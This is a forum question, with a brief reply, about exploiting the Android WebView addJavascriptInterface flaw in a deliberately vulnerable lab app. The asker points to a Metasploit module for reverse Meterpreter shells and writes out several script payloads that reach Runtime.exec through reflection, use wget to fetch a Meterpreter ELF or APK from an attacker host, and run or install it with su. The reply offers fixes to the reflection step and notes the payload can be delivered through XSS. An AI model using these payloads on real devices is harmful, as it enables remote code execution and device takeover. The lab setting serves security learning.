I have been banging my head around this for almost 56 hours now (+/- a few that I took out to have a couple of naps and RedBulls) and have not been able to get anywhere with it so far.
I am trying to understand the addjavascriptinterface in WebView in Android API 16 and lower or apps compiled against those APIs. The vulnerability itself has been pretty well explained here at MWR blog
For successful exploitation following Metasploit Module helps : exploit/android/browser/webview_addjavascriptinterface
and using the above I am able to get a reverse Meterpreter shell as soon as the victim visits the URL where am listening.
The above works only on stock browsers on Android 4.1.2 and lower that as the browser itself has the mentioned vulnerability.
Now I was trying to understand the same in context of an app. So I used a deliberately vulnerable app (InsecureBank V2)
The app uses WebView with javascript enabled and I tweaked it to use the addjavascriptinterface as well.
Now I am able to exploit the vulnerability and get some code executed as soon as the victim visits the vulnerable WebView.
The MWR blog above mentions a way to drop Weasel on the victim device through command execution and connect back to attacker on a drozer server. But the way they have defined it does not seem to work in my case.
Also there are no Metasploit modules that exploit this kind of a scenario. I am able to run wget and fetch a meterpreter payload (tried x86 as elf binary /armle as elf bonary /android as apk ) from my server on the device. When I run these as shell user manually, I get a successful meterpreter session again. But if I try to do something of the format :
function execute(cmd){ return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd); } execute(['/system/bin/sh','-c','wget -P /sdcard/ http://192.168.56.102/shell.elf']); execute(['/system/bin/sh','-c','/sdcard/shell.elf']); I just doesn't work. I do not get any reverse TCP session. Nor does the below work
<script> function execute(cmd){ return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd); } execute(['/system/bin/sh','-c','wget -P /sdcard/ http://192.168.56.102/hack.apk']); execute(['/system/bin/sh','-c','/system/xbin/su pm install hack.apk']); </script> or the below:
<script> function execute(cmd){ return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd); } execute(['/system/bin/sh','-c','wget -P /sdcard/ http://192.168.56.102/hack.apk']); execute(['/system/bin/sh','-c','su pm install hack.apk']); </script> How do I execute the payload that I copied onto the victim's device using wget. Most of the resources I came across over the internet mention
- How to get the generate the android specific payload (msfvenom, drozer payload etc.)
- How to deliver it to the victim's machine (wget for instance)
and then they say once the payload is executed by the user or apk installed by the user, we get a reverse TCP etc. session on the attacker machine.
No one explains how through the code execution can the payload be executed (apk installed/exe triggered).
Any help would be greatly appreciated.
Class.forNameis a static method, so maybe can't be run from an instance - it might be better to do something like...getClass().getClassLoader().loadClass(...)etc. (3) I don't think malicious code necessarily needs to be on a device, it could be on the web, the point is that a vulnerable app (which usesaddJavascriptInterfaceAND has a webview that loads untrusted code) could load the malicious code inside the webview, whether by XSS or site hijack etc.